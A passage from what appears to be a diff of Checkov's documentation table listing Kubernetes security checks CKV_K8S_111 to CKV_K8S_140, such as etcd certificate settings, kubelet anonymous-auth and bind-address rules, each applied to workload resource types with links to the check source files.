[KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3259 | CKV_K8S_111 | resource | DaemonSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3260 | CKV_K8S_111 | resource | Deployment | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3261 | CKV_K8S_111 | resource | DeploymentConfig | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3262 | CKV_K8S_111 | resource | Job | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3263 | CKV_K8S_111 | resource | Pod | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3264 | CKV_K8S_111 | resource | PodTemplate | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3265 | CKV_K8S_111 | resource | ReplicaSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3266 | CKV_K8S_111 | resource | ReplicationController | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3267 | CKV_K8S_111 | resource | StatefulSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3268 | CKV_K8S_112 | resource | CronJob | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3269 | CKV_K8S_112 | resource | DaemonSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3270 | CKV_K8S_112 | resource | Deployment | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3271 | CKV_K8S_112 | resource | DeploymentConfig | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3272 | CKV_K8S_112 | resource | Job | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3273 | CKV_K8S_112 | resource | Pod | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3274 | CKV_K8S_112 | resource | PodTemplate | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3275 | CKV_K8S_112 | resource | ReplicaSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3276 | CKV_K8S_112 | resource | ReplicationController | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3277 | CKV_K8S_112 | resource | StatefulSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3278 | CKV_K8S_113 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3279 | CKV_K8S_113 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3280 | CKV_K8S_113 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3281 | CKV_K8S_113 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3282 | CKV_K8S_113 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3283 | CKV_K8S_113 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3284 | CKV_K8S_113 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3285 | CKV_K8S_113 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3286 | CKV_K8S_113 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3287 | CKV_K8S_113 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3288 | CKV_K8S_114 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3289 | CKV_K8S_114 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3290 | CKV_K8S_114 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3291 | CKV_K8S_114 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3292 | CKV_K8S_114 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3293 | CKV_K8S_114 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3294 | CKV_K8S_114 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3295 | CKV_K8S_114 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3296 | CKV_K8S_114 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3297 | CKV_K8S_114 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3298 | CKV_K8S_115 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3299 | CKV_K8S_115 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3300 | CKV_K8S_115 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3301 | CKV_K8S_115 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3302 | CKV_K8S_115 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3303 | CKV_K8S_115 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3304 | CKV_K8S_115 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3305 | CKV_K8S_115 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3306 | CKV_K8S_115 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3307 | CKV_K8S_115 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3308 | CKV_K8S_116 | resource | CronJob | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3309 | CKV_K8S_116 | resource | DaemonSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3310 | CKV_K8S_116 | resource | Deployment | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3311 | CKV_K8S_116 | resource | DeploymentConfig | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3312 | CKV_K8S_116 | resource | Job | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3313 | CKV_K8S_116 | resource | Pod | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3314 | CKV_K8S_116 | resource | PodTemplate | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3315 | CKV_K8S_116 | resource | ReplicaSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3316 | CKV_K8S_116 | resource | ReplicationController | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3317 | CKV_K8S_116 | resource | StatefulSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3318 | CKV_K8S_117 | resource | CronJob | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3319 | CKV_K8S_117 | resource | DaemonSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3320 | CKV_K8S_117 | resource | Deployment | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3321 | CKV_K8S_117 | resource | DeploymentConfig | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3322 | CKV_K8S_117 | resource | Job | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3323 | CKV_K8S_117 | resource | Pod | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3324 | CKV_K8S_117 | resource | PodTemplate | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3325 | CKV_K8S_117 | resource | ReplicaSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3326 | CKV_K8S_117 | resource | ReplicationController | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3327 | CKV_K8S_117 | resource | StatefulSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3328 | CKV_K8S_118 | resource | CronJob | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3329 | CKV_K8S_118 | resource | DaemonSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3330 | CKV_K8S_118 | resource | Deployment | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3331 | CKV_K8S_118 | resource | DeploymentConfig | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3332 | CKV_K8S_118 | resource | Job | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3333 | CKV_K8S_118 | resource | Pod | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3334 | CKV_K8S_118 | resource | PodTemplate | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3335 | CKV_K8S_118 | resource | ReplicaSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3336 | CKV_K8S_118 | resource | ReplicationController | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3337 | CKV_K8S_118 | resource | StatefulSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | -| 3338 | CKV_K8S_119 | resource | CronJob | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3339 | CKV_K8S_119 | resource | DaemonSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3340 | CKV_K8S_119 | resource | Deployment | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3341 | CKV_K8S_119 | resource | DeploymentConfig | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3342 | CKV_K8S_119 | resource | Job | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3343 | CKV_K8S_119 | resource | Pod | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3344 | CKV_K8S_119 | resource | PodTemplate | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3345 | CKV_K8S_119 | resource | ReplicaSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3346 | CKV_K8S_119 | resource | ReplicationController | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3347 | CKV_K8S_119 | resource | StatefulSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | -| 3348 | CKV_K8S_121 | resource | Pod | Ensure that the --peer-client-cert-auth argument is set to true | Kubernetes | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py) | -| 3349 | CKV_K8S_138 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3350 | CKV_K8S_138 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3351 | CKV_K8S_138 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3352 | CKV_K8S_138 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3353 | CKV_K8S_138 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3354 | CKV_K8S_138 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3355 | CKV_K8S_138 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3356 | CKV_K8S_138 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3357 | CKV_K8S_138 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3358 | CKV_K8S_138 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) | -| 3359 | CKV_K8S_139 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3360 | CKV_K8S_139 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3361 | CKV_K8S_139 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3362 | CKV_K8S_139 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3363 | CKV_K8S_139 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3364 | CKV_K8S_139 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3365 | CKV_K8S_139 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3366 | CKV_K8S_139 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3367 | CKV_K8S_139 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3368 | CKV_K8S_139 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) | -| 3369 | CKV_K8S_140 | resource | CronJob | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) | -| 3370 | CKV_K8S_140 | resource | DaemonSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | 